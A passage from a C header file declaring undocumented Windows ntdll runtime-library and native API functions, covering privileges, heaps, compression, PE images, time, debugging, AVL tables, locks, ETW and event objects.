LARGE_INTEGER TempLi;
TempLi.QuadPart = Long;
TempLuid.LowPart = TempLi.LowPart;
TempLuid.HighPart = TempLi.HighPart;
return(TempLuid);
}
FORCEINLINE
LUID
RtlConvertUlongToLuid(
_In_ ULONG Ulong
)
{
LUID tempLuid;
tempLuid.LowPart = Ulong;
tempLuid.HighPart = 0;
return tempLuid;
}
NTSYSAPI
ULONG
NTAPI
RtlUniform(
_Inout_ PULONG Seed);
NTSYSAPI
ULONG
NTAPI
RtlRandomEx(
_Inout_ PULONG Seed);
NTSYSAPI
ULONG32
NTAPI
RtlComputeCrc32(
_In_ ULONG32 PartialCrc,
_In_ PVOID Buffer,
_In_ ULONG Length);
NTSYSAPI
NTSTATUS
NTAPI
RtlAdjustPrivilege(
_In_ ULONG Privilege,
_In_ BOOLEAN Enable,
_In_ BOOLEAN Client,
_Out_ PBOOLEAN WasEnabled);
#define RTL_ACQUIRE_PRIVILEGE_REVERT 0x00000001
#define RTL_ACQUIRE_PRIVILEGE_PROCESS 0x00000002
NTSYSAPI
NTSTATUS
NTAPI
RtlAcquirePrivilege(
_In_ PULONG Privilege,
_In_ ULONG NumPriv,
_In_ ULONG Flags,
_Out_ PVOID* ReturnedState);
NTSYSAPI
VOID
NTAPI
RtlReleasePrivilege(
_In_ PVOID StatePointer);
NTSYSAPI
NTSTATUS
NTAPI
RtlRemovePrivileges(
_In_ HANDLE TokenHandle,
_In_ PULONG PrivilegesToKeep,
_In_ ULONG PrivilegeCount);
NTSYSAPI
BOOLEAN
NTAPI
RtlAreAllAccessesGranted(
_In_ ACCESS_MASK GrantedAccess,
_In_ ACCESS_MASK DesiredAccess);
NTSYSAPI
BOOLEAN
NTAPI
RtlAreAnyAccessesGranted(
_In_ ACCESS_MASK GrantedAccess,
_In_ ACCESS_MASK DesiredAccess);
NTSYSAPI
VOID
NTAPI
RtlMapGenericMask(
_In_ PACCESS_MASK AccessMask,
_In_ PGENERIC_MAPPING GenericMapping);
NTSYSAPI
NTSTATUS
NTAPI
RtlImpersonateSelf(
_In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel);
NTSYSAPI
NTSTATUS
NTAPI
RtlImpersonateSelfEx(
_In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
_In_opt_ ACCESS_MASK AdditionalAccess,
_Out_opt_ PHANDLE ThreadToken);
/************************************************************************************
*
* RTL Version API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
RtlGetVersion(
_Inout_ PRTL_OSVERSIONINFOW lpVersionInformation);
NTSYSAPI
VOID
NTAPI
RtlGetNtVersionNumbers(
_Out_opt_ PULONG MajorVersion,
_Out_opt_ PULONG MinorVersion,
_Out_opt_ PULONG BuildNumber);
/************************************************************************************
*
* RTL Error Status API.
*
************************************************************************************/
_When_(Status < 0, _Out_range_(> , 0))
_When_(Status >= 0, _Out_range_(== , 0))
NTSYSAPI
ULONG
NTAPI
RtlNtStatusToDosError(
_In_ NTSTATUS Status);
NTSYSAPI
VOID
NTAPI
RtlSetLastWin32Error(
_In_ LONG Win32Error);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetLastNtStatus(
VOID);
NTSYSAPI
LONG
NTAPI
RtlGetLastWin32Error(
VOID);
_When_(Status < 0, _Out_range_(> , 0))
_When_(Status >= 0, _Out_range_(== , 0))
NTSYSAPI
ULONG
NTAPI
RtlNtStatusToDosErrorNoTeb(
_In_ NTSTATUS Status);
NTSYSAPI
VOID
NTAPI
RtlSetLastWin32ErrorAndNtStatusFromNtStatus(
_In_ NTSTATUS Status);
/************************************************************************************
*
* RTL WOW64 Support API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
RtlWow64EnableFsRedirection(
_In_ BOOLEAN Wow64FsEnableRedirection);
NTSYSAPI
NTSTATUS
NTAPI
RtlWow64EnableFsRedirectionEx(
_In_ PVOID DisableFsRedirection,
_Out_ PVOID *OldFsRedirectionLevel);
NTSYSAPI
NTSTATUS
NTAPI
RtlWow64GetThreadContext(
_In_ HANDLE ThreadHandle,
_Inout_ PWOW64_CONTEXT ThreadContext);
NTSYSAPI
NTSTATUS
NTAPI
RtlWow64SetThreadContext(
_In_ HANDLE ThreadHandle,
_In_ PWOW64_CONTEXT ThreadContext);
/************************************************************************************
*
* RTL Heap Management API.
*
************************************************************************************/
typedef NTSTATUS(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(
_In_ PVOID Base,
_Inout_ PVOID *CommitAddress,
_Inout_ PSIZE_T CommitSize
);
typedef struct _RTL_HEAP_PARAMETERS {
ULONG Length;
SIZE_T SegmentReserve;
SIZE_T SegmentCommit;
SIZE_T DeCommitFreeBlockThreshold;
SIZE_T DeCommitTotalFreeThreshold;
SIZE_T MaximumAllocationSize;
SIZE_T VirtualMemoryThreshold;
SIZE_T InitialCommit;
SIZE_T InitialReserve;
PRTL_HEAP_COMMIT_ROUTINE CommitRoutine;
SIZE_T Reserved[2];
} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;
_Must_inspect_result_
NTSYSAPI
PVOID
NTAPI
RtlCreateHeap(
_In_ ULONG Flags,
_In_opt_ PVOID HeapBase,
_In_ SIZE_T ReserveSize,
_In_ SIZE_T CommitSize,
_In_opt_ PVOID Lock,
_In_opt_ PRTL_HEAP_PARAMETERS Parameters);
NTSYSAPI
PVOID
NTAPI
RtlDestroyHeap(
_In_ PVOID HeapHandle);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetHeapInformation(
_In_opt_ PVOID HeapHandle,
_In_ HEAP_INFORMATION_CLASS HeapInformationClass,
_In_opt_ PVOID HeapInformation,
_In_ SIZE_T HeapInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryHeapInformation(
_In_ PVOID HeapHandle,
_In_ HEAP_INFORMATION_CLASS HeapInformationClass,
_Out_opt_ PVOID HeapInformation,
_In_opt_ SIZE_T HeapInformationLength,
_Out_opt_ PSIZE_T ReturnLength);
_Must_inspect_result_
NTSYSAPI
PVOID
NTAPI
RtlAllocateHeap(
_In_ PVOID HeapHandle,
_In_ ULONG Flags,
_In_ SIZE_T Size);
NTSYSAPI
BOOLEAN
NTAPI
RtlFreeHeap(
_In_ PVOID HeapHandle,
_In_ ULONG Flags,
_Frees_ptr_opt_ _Post_invalid_ PVOID BaseAddress);
NTSYSAPI
NTSTATUS
NTAPI
RtlZeroHeap(
_In_ PVOID HeapHandle,
_In_ ULONG Flags);
NTSYSAPI
SIZE_T
NTAPI
RtlSizeHeap(
_In_ PVOID HeapHandle,
_In_ ULONG Flags,
_In_ PVOID BaseAddress);
NTSYSAPI
VOID
NTAPI
RtlProtectHeap(
_In_ PVOID HeapHandle,
_In_ BOOLEAN MakeReadOnly);
NTSYSAPI
PVOID
NTAPI
RtlReAllocateHeap(
_In_ PVOID HeapHandle,
_In_ ULONG Flags,
_Frees_ptr_opt_ PVOID BaseAddress,
_In_ SIZE_T Size);
NTSYSAPI
ULONG
NTAPI
RtlGetProcessHeaps(
_In_ ULONG NumberOfHeaps,
_Out_ PVOID *ProcessHeaps);
typedef NTSTATUS(NTAPI *PRTL_ENUM_HEAPS_ROUTINE)(
_In_ PVOID HeapHandle,
_In_ PVOID Parameter
);
NTSYSAPI
NTSTATUS
NTAPI
RtlEnumProcessHeaps(
_In_ PRTL_ENUM_HEAPS_ROUTINE EnumRoutine,
_In_ PVOID Parameter);
/************************************************************************************
*
* RTL Compression API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
RtlGetCompressionWorkSpaceSize(
_In_ USHORT CompressionFormatAndEngine,
_Out_ PULONG CompressBufferWorkSpaceSize,
_Out_ PULONG CompressFragmentWorkSpaceSize);
NTSYSAPI
NTSTATUS
NTAPI
RtlCompressBuffer(
_In_ USHORT CompressionFormatAndEngine,
_In_reads_bytes_(UncompressedBufferSize) PUCHAR UncompressedBuffer,
_In_ ULONG UncompressedBufferSize,
_Out_writes_bytes_to_(CompressedBufferSize, *FinalCompressedSize) PUCHAR CompressedBuffer,
_In_ ULONG CompressedBufferSize,
_In_ ULONG UncompressedChunkSize,
_Out_ PULONG FinalCompressedSize,
_In_ PVOID WorkSpace);
NTSYSAPI
NTSTATUS
NTAPI
RtlDecompressBuffer(
_In_ USHORT CompressionFormat,
_Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,
_In_ ULONG UncompressedBufferSize,
_In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,
_In_ ULONG CompressedBufferSize,
_Out_ PULONG FinalUncompressedSize);
NTSYSAPI
NTSTATUS
NTAPI
RtlDecompressBufferEx(
_In_ USHORT CompressionFormat,
_Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,
_In_ ULONG UncompressedBufferSize,
_In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,
_In_ ULONG CompressedBufferSize,
_Out_ PULONG FinalUncompressedSize,
_In_ PVOID WorkSpace);
/************************************************************************************
*
* RTL Image API.
*
************************************************************************************/
#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)
NTSYSAPI
PIMAGE_NT_HEADERS
NTAPI
RtlImageNtHeader(
_In_ PVOID Base);
NTSYSAPI
NTSTATUS
NTAPI
RtlImageNtHeaderEx(
_In_ ULONG Flags,
_In_ PVOID Base,
_In_ ULONG64 Size,
_Out_ PIMAGE_NT_HEADERS * OutHeaders);
NTSYSAPI
PVOID
NTAPI
RtlAddressInSectionTable(
_In_ PIMAGE_NT_HEADERS NtHeaders,
_In_ PVOID BaseOfImage,
_In_ ULONG VirtualAddress);
NTSYSAPI
PIMAGE_SECTION_HEADER
NTAPI
RtlSectionTableFromVirtualAddress(
_In_ PIMAGE_NT_HEADERS NtHeaders,
_In_ PVOID BaseOfImage,
_In_ ULONG VirtualAddress);
NTSYSAPI
PVOID
NTAPI
RtlImageDirectoryEntryToData(
_In_ PVOID BaseOfImage,
_In_ BOOLEAN MappedAsImage,
_In_ USHORT DirectoryEntry,
_Out_ PULONG Size);
NTSYSAPI
PIMAGE_SECTION_HEADER
NTAPI
RtlImageRvaToSection(
_In_ PIMAGE_NT_HEADERS NtHeaders,
_In_ PVOID Base,
_In_ ULONG Rva);
NTSYSAPI
PVOID
NTAPI
RtlImageRvaToVa(
_In_ PIMAGE_NT_HEADERS NtHeaders,
_In_ PVOID Base,
_In_ ULONG Rva,
_Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection);
NTSYSAPI
PVOID
NTAPI
RtlFindExportedRoutineByName(
_In_ PVOID BaseOfImage,
_In_ PSTR RoutineName);
NTSYSAPI
NTSTATUS
NTAPI
RtlGuardCheckLongJumpTarget(
_In_ PVOID PcValue,
_In_ BOOL IsFastFail,
_Out_ PBOOL IsLongJumpTarget);
/************************************************************************************
*
* RTL Time API.
*
************************************************************************************/
NTSYSAPI
VOID
NTAPI
RtlSecondsSince1970ToTime(
_In_ ULONG ElapsedSeconds,
_Out_ PLARGE_INTEGER Time);
NTSYSAPI
BOOLEAN
NTAPI
RtlTimeToSecondsSince1970(
_In_ PLARGE_INTEGER Time,
_Out_ PULONG ElapsedSeconds);
NTSYSAPI
VOID
NTAPI
RtlSecondsSince1980ToTime(
_In_ ULONG ElapsedSeconds,
_Out_ PLARGE_INTEGER Time);
NTSYSAPI
BOOLEAN
NTAPI
RtlTimeToSecondsSince1980(
_In_ PLARGE_INTEGER Time,
_Out_ PULONG ElapsedSeconds);
NTSYSAPI
VOID
NTAPI
RtlTimeToTimeFields(
_In_ PLARGE_INTEGER Time,
_Out_ PTIME_FIELDS TimeFields);
NTSYSAPI
BOOLEAN
NTAPI
RtlTimeFieldsToTime(
_In_ PTIME_FIELDS TimeFields,
_Out_ PLARGE_INTEGER Time);
NTSYSAPI
NTSTATUS
NTAPI
RtlSystemTimeToLocalTime(
_In_ PLARGE_INTEGER SystemTime,
_Out_ PLARGE_INTEGER LocalTime);
NTSYSAPI
NTSTATUS
NTAPI
RtlLocalTimeToSystemTime(
_In_ PLARGE_INTEGER LocalTime,
_Out_ PLARGE_INTEGER SystemTime);
NTSYSAPI
ULONGLONG
NTAPI
RtlGetSystemTimePrecise(
VOID);
NTSYSAPI
LARGE_INTEGER
NTAPI
RtlGetInterruptTimePrecise(
_Out_ PLARGE_INTEGER PerformanceCounter);
NTSYSAPI
BOOLEAN
NTAPI
RtlQueryUnbiasedInterruptTime(
_Out_ PLARGE_INTEGER InterruptTime);
NTSYSAPI
KSYSTEM_TIME
NTAPI
RtlGetSystemTimeAndBias(
_Out_ KSYSTEM_TIME TimeZoneBias,
_Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveStart,
_Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveEnd);
/************************************************************************************
*
* RTL Debug Support API.
*
************************************************************************************/
NTSYSAPI
ULONG
STDAPIVCALLTYPE
DbgPrint(
_In_z_ _Printf_format_string_ PCCH Format,
...);
NTSYSAPI
ULONG
STDAPIVCALLTYPE
DbgPrintEx(
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_z_ _Printf_format_string_ PCCH Format,
...);
NTSYSAPI
NTSTATUS
NTAPI
DbgQueryDebugFilterState(
_In_ ULONG ComponentId,
_In_ ULONG Level);
NTSYSAPI
NTSTATUS
NTAPI
DbgSetDebugFilterState(
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_ BOOLEAN State);
NTSYSAPI
VOID
NTAPI
DbgUserBreakPoint(
VOID);
NTSYSAPI
VOID
NTAPI
DbgBreakPoint(
VOID);
NTSYSAPI
NTSTATUS
NTAPI
DbgUiConnectToDbg(
VOID);
NTSYSAPI
VOID
NTAPI
DbgUiSetThreadDebugObject(
_In_ HANDLE DebugObject);
NTSYSAPI
NTSTATUS
NTAPI
DbgUiContinue(
_In_ PCLIENT_ID AppClientId,
_In_ NTSTATUS ContinueStatus);
NTSYSAPI
NTSTATUS
NTAPI
DbgUiStopDebugging(
_In_ HANDLE Process);
NTSYSAPI
NTSTATUS
NTAPI
DbgUiDebugActiveProcess(
_In_ HANDLE Process);
NTSYSAPI
_Success_(return != 0)
USHORT
NTAPI
RtlCaptureStackBackTrace(
_In_ ULONG FramesToSkip,
_In_ ULONG FramesToCapture,
_Out_writes_to_(FramesToCapture, return) PVOID* BackTrace,
_Out_opt_ PULONG BackTraceHash);
/************************************************************************************
*
* RTL AVL Tree API.
*
************************************************************************************/
typedef enum _TABLE_SEARCH_RESULT {
TableEmptyTree,
TableFoundNode,
TableInsertAsLeft,
TableInsertAsRight
} TABLE_SEARCH_RESULT;
typedef enum _RTL_GENERIC_COMPARE_RESULTS {
GenericLessThan,
GenericGreaterThan,
GenericEqual
} RTL_GENERIC_COMPARE_RESULTS;
//
// Add an empty typedef so that functions can reference the
// a pointer to the generic table struct before it is declared.
//
#if defined (__cplusplus)
struct _RTL_AVL_TABLE;
#else
typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;
typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;
#endif
typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(
_In_ struct _RTL_AVL_TABLE *Table,
_In_ PVOID FirstStruct,
_In_ PVOID SecondStruct
);
typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(
_In_ struct _RTL_AVL_TABLE *Table,
_In_ ULONG ByteSize
);
typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(
_In_ struct _RTL_AVL_TABLE *Table,
_In_ _Post_invalid_ PVOID Buffer
);
typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(
_In_ struct _RTL_AVL_TABLE *Table,
_In_ PVOID UserData,
_In_ PVOID MatchData
);
typedef struct _RTL_BALANCED_LINKS {
struct _RTL_BALANCED_LINKS *Parent;
struct _RTL_BALANCED_LINKS *LeftChild;
struct _RTL_BALANCED_LINKS *RightChild;
CHAR Balance;
UCHAR Reserved[3];
} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;
typedef struct _RTL_AVL_TABLE {
RTL_BALANCED_LINKS BalancedRoot;
PVOID OrderedPointer;
ULONG WhichOrderedElement;
ULONG NumberGenericTableElements;
ULONG DepthOfTree;
PRTL_BALANCED_LINKS RestartKey;
ULONG DeleteCount;
PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
PRTL_AVL_FREE_ROUTINE FreeRoutine;
PVOID TableContext;
} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
NTSYSAPI
VOID
NTAPI
RtlInitializeGenericTableAvl(
_Out_ PRTL_AVL_TABLE Table,
_In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,
_In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,
_In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,
_In_opt_ PVOID TableContext);
NTSYSAPI
PVOID
NTAPI
RtlInsertElementGenericTableAvl(
_In_ PRTL_AVL_TABLE Table,
_In_reads_bytes_(BufferSize) PVOID Buffer,
_In_ CLONG BufferSize,
_Out_opt_ PBOOLEAN NewElement);
NTSYSAPI
PVOID
NTAPI
RtlInsertElementGenericTableFullAvl(
_In_ PRTL_AVL_TABLE Table,
_In_reads_bytes_(BufferSize) PVOID Buffer,
_In_ CLONG BufferSize,
_Out_opt_ PBOOLEAN NewElement,
_In_ PVOID NodeOrParent,
_In_ TABLE_SEARCH_RESULT SearchResult);
NTSYSAPI
BOOLEAN
NTAPI
RtlDeleteElementGenericTableAvl(
_In_ PRTL_AVL_TABLE Table,
_In_ PVOID Buffer);
NTSYSAPI
PVOID
NTAPI
RtlLookupElementGenericTableAvl(
_In_ PRTL_AVL_TABLE Table,
_In_ PVOID Buffer);
NTSYSAPI
PVOID
NTAPI
RtlLookupElementGenericTableFullAvl(
_In_ PRTL_AVL_TABLE Table,
_In_ PVOID Buffer,
_Out_ PVOID *NodeOrParent,
_Out_ TABLE_SEARCH_RESULT *SearchResult);
NTSYSAPI
PVOID
NTAPI
RtlEnumerateGenericTableAvl(
_In_ PRTL_AVL_TABLE Table,
_In_ BOOLEAN Restart);
NTSYSAPI
PVOID
NTAPI
RtlEnumerateGenericTableWithoutSplayingAvl(
_In_ PRTL_AVL_TABLE Table,
_Inout_ PVOID *RestartKey);
NTSYSAPI
PVOID
NTAPI
RtlLookupFirstMatchingElementGenericTableAvl(
_In_ PRTL_AVL_TABLE Table,
_In_ PVOID Buffer,
_Out_ PVOID *RestartKey);
NTSYSAPI
PVOID
NTAPI
RtlEnumerateGenericTableLikeADirectory(
_In_ PRTL_AVL_TABLE Table,
_In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,
_In_opt_ PVOID MatchData,
_In_ ULONG NextFlag,
_Inout_ PVOID *RestartKey,
_Inout_ PULONG DeleteCount,
_In_ PVOID Buffer);
NTSYSAPI
PVOID
NTAPI
RtlGetElementGenericTableAvl(
_In_ PRTL_AVL_TABLE Table,
_In_ ULONG I);
NTSYSAPI
ULONG
NTAPI
RtlNumberGenericTableElementsAvl(
_In_ PRTL_AVL_TABLE Table);
NTSYSAPI
BOOLEAN
NTAPI
RtlIsGenericTableEmptyAvl(
_In_ PRTL_AVL_TABLE Table);
/************************************************************************************
*
* RTL Critical Section Support API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
RtlEnterCriticalSection(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
NTSTATUS
NTAPI
RtlLeaveCriticalSection(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
LOGICAL
NTAPI
RtlIsCriticalSectionLocked(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
LOGICAL
NTAPI
RtlIsCriticalSectionLockedByThread(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
ULONG
NTAPI
RtlGetCriticalSectionRecursionCount(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
LOGICAL
NTAPI
RtlTryEnterCriticalSection(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
NTSTATUS
NTAPI
RtlInitializeCriticalSection(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
NTSYSAPI
VOID
NTAPI
RtlEnableEarlyCriticalSectionEventCreation(
VOID);
NTSYSAPI
NTSTATUS
NTAPI
RtlInitializeCriticalSectionAndSpinCount(
_In_ PRTL_CRITICAL_SECTION CriticalSection,
_In_ ULONG SpinCount);
NTSYSAPI
ULONG
NTAPI
RtlSetCriticalSectionSpinCount(
_In_ PRTL_CRITICAL_SECTION CriticalSection,
_In_ ULONG SpinCount);
NTSYSAPI
NTSTATUS
NTAPI
RtlDeleteCriticalSection(
_In_ PRTL_CRITICAL_SECTION CriticalSection);
/************************************************************************************
*
* RTL SRW Lock Support API.
*
************************************************************************************/
NTSYSAPI
VOID
NTAPI
RtlInitializeSRWLock(
_Out_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
VOID
NTAPI
RtlAcquireSRWLockExclusive(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
VOID
NTAPI
RtlAcquireSRWLockShared(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
VOID
NTAPI
RtlReleaseSRWLockExclusive(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
VOID
NTAPI
RtlReleaseSRWLockShared(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
BOOLEAN
NTAPI
RtlTryAcquireSRWLockExclusive(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
BOOLEAN
NTAPI
RtlTryAcquireSRWLockShared(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
VOID
NTAPI
RtlAcquireReleaseSRWLockExclusive(
_Inout_ PRTL_SRWLOCK SRWLock);
NTSYSAPI
VOID
NTAPI
RtlUpdateClonedSRWLock(
_Inout_ PRTL_SRWLOCK SRWLock,
_In_ LOGICAL Shared);
/************************************************************************************
*
* RTL UAC Support API.
*
************************************************************************************/
#define DBG_FLAG_ELEVATION_ENABLED 1
#define DBG_FLAG_VIRTUALIZATION_ENABLED 2
#define DBG_FLAG_INSTALLER_DETECT_ENABLED 3
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryElevationFlags(
_Inout_ ULONG *ElevationFlags);
/************************************************************************************
*
* RTL Misc Support API.
*
************************************************************************************/
NTSYSAPI
BOOLEAN
NTAPI
RtlDoesFileExists_U(
_In_ PCWSTR FileName);
NTSYSAPI
ULONG
NTAPI
RtlGetLongestNtPathLength(
VOID);
NTSYSAPI
BOOLEAN
NTAPI
RtlAreLongPathsEnabled(
VOID);
/************************************************************************************
*
* RTL Boundary Descriptor API.
*
************************************************************************************/
NTSYSAPI
PVOID
NTAPI
RtlCreateBoundaryDescriptor(
_In_ PUNICODE_STRING Name,
_In_ ULONG Flags);
NTSYSAPI
VOID
NTAPI
RtlDeleteBoundaryDescriptor(
_In_ _Post_invalid_ PVOID BoundaryDescriptor);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddSIDToBoundaryDescriptor(
_Inout_ PVOID *BoundaryDescriptor,
_In_ PSID RequiredSid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddIntegrityLabelToBoundaryDescriptor(
_Inout_ PVOID *BoundaryDescriptor,
_In_ PSID IntegrityLabel);
/************************************************************************************
*
* RTL work item/async IO.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
RtlQueueWorkItem(
_In_ WORKERCALLBACKFUNC Function,
_In_ PVOID Context,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetIoCompletionCallback(
_In_ HANDLE FileHandle,
_In_ APC_CALLBACK_FUNCTION CompletionProc,
_In_ ULONG Flags);
/************************************************************************************
*
* RTL data exports.
*
************************************************************************************/
#ifndef _M_X64
#define RtlNtdllName L"ntdll.dll"
#define RtlDosPathSeperatorsString ((UNICODE_STRING)RTL_CONSTANT_STRING(L"\\/"))
#define RtlAlternateDosPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L"/"))
#define RtlNtPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L"\\"))
#else
NTSYSAPI PWSTR RtlNtdllName;
NTSYSAPI UNICODE_STRING RtlDosPathSeperatorsString;
NTSYSAPI UNICODE_STRING RtlAlternateDosPathSeperatorString;
NTSYSAPI UNICODE_STRING RtlNtPathSeperatorString;
#endif
/************************************************************************************
*
* ETW API.
*
************************************************************************************/
typedef VOID(NTAPI *PETWENABLECALLBACK)(
_In_ LPCGUID SourceId,
_In_ ULONG IsEnabled,
_In_ UCHAR Level,
_In_ ULONGLONG MatchAnyKeyword,
_In_ ULONGLONG MatchAllKeyword,
_In_opt_ /*EVENT_FILTER_DESCRIPTOR*/ PVOID FilterData,
_Inout_opt_ PVOID CallbackContext
);
NTSYSAPI
NTSTATUS
NTAPI
EtwEventRegister(
_In_ LPCGUID ProviderId,
_In_opt_ PETWENABLECALLBACK EnableCallback,
_In_opt_ PVOID CallbackContext,
_Out_ PREGHANDLE RegHandle);
NTSYSAPI
ULONG
NTAPI
EtwEventWriteNoRegistration(
_In_ LPCGUID ProviderId,
_In_ /*PCEVENT_DESCRIPTOR*/ PVOID EventDescriptor,
_In_ ULONG UserDataCount,
_In_reads_opt_(UserDataCount) /*PEVENT_DATA_DESCRIPTOR*/PVOID UserData);
/*
** Runtime Library API END
*/
/*
** Native API START
*/
/************************************************************************************
*
* System Information API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
WINAPI
NtQuerySystemInformation(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
_Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySystemInformationEx(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
_In_reads_bytes_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetSystemInformation(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
_In_reads_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
_In_ ULONG SystemInformationLength);
/************************************************************************************
*
* Event (EventPair) API.
*
************************************************************************************/
typedef enum _EVENT_INFORMATION_CLASS {
EventBasicInformation
} EVENT_INFORMATION_CLASS;
typedef enum _EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
} EVENT_TYPE;
typedef struct _EVENT_BASIC_INFORMATION {
EVENT_TYPE EventType;
LONG EventState;
} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateEvent(
_Out_ PHANDLE EventHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ EVENT_TYPE EventType,
_In_ BOOLEAN InitialState);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenEvent(
_Out_ PHANDLE EventHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtSetEvent(
_In_ HANDLE EventHandle,
_Out_opt_ PLONG PreviousState);
NTSYSAPI
NTSTATUS
NTAPI
NtSetEventEx(
_In_ HANDLE ThreadId,
_In_opt_ PRTL_SRWLOCK Lock);
NTSYSAPI
NTSTATUS
NTAPI
NtClearEvent(
_In_ HANDLE EventHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtResetEvent(
_In_ HANDLE EventHandle,
_Out_opt_ PLONG PreviousState);
NTSYSAPI
NTSTATUS
NTAPI
NtPulseEvent(
_In_ HANDLE EventHandle,
_Out_opt_ PLONG PreviousState);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyedEvent(
_Out_ PHANDLE KeyedEventHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryEvent(
_In_ HANDLE EventHandle,
_In_ EVENT_INFORMATION_CLASS EventInformationClass,
_Out_writes_bytes_(EventInformationLength) PVOID EventInformation,
_In_ ULONG EventInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateEventPair(
_Out_ PHANDLE EventPairHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenEventPair(
_Out_ PHANDLE EventPairHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtSetLowEventPair(
_In_ HANDLE EventPairHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtSetHighEventPair(
_In_ HANDLE EventPairHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtWaitLowEventPair(
_In_ HANDLE EventPairHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtWaitHighEventPair(
_In_ HANDLE EventPairHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtSetLowWaitHighEventPair(
_In_ HANDLE EventPairHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtSetHighWaitLowEventPair(
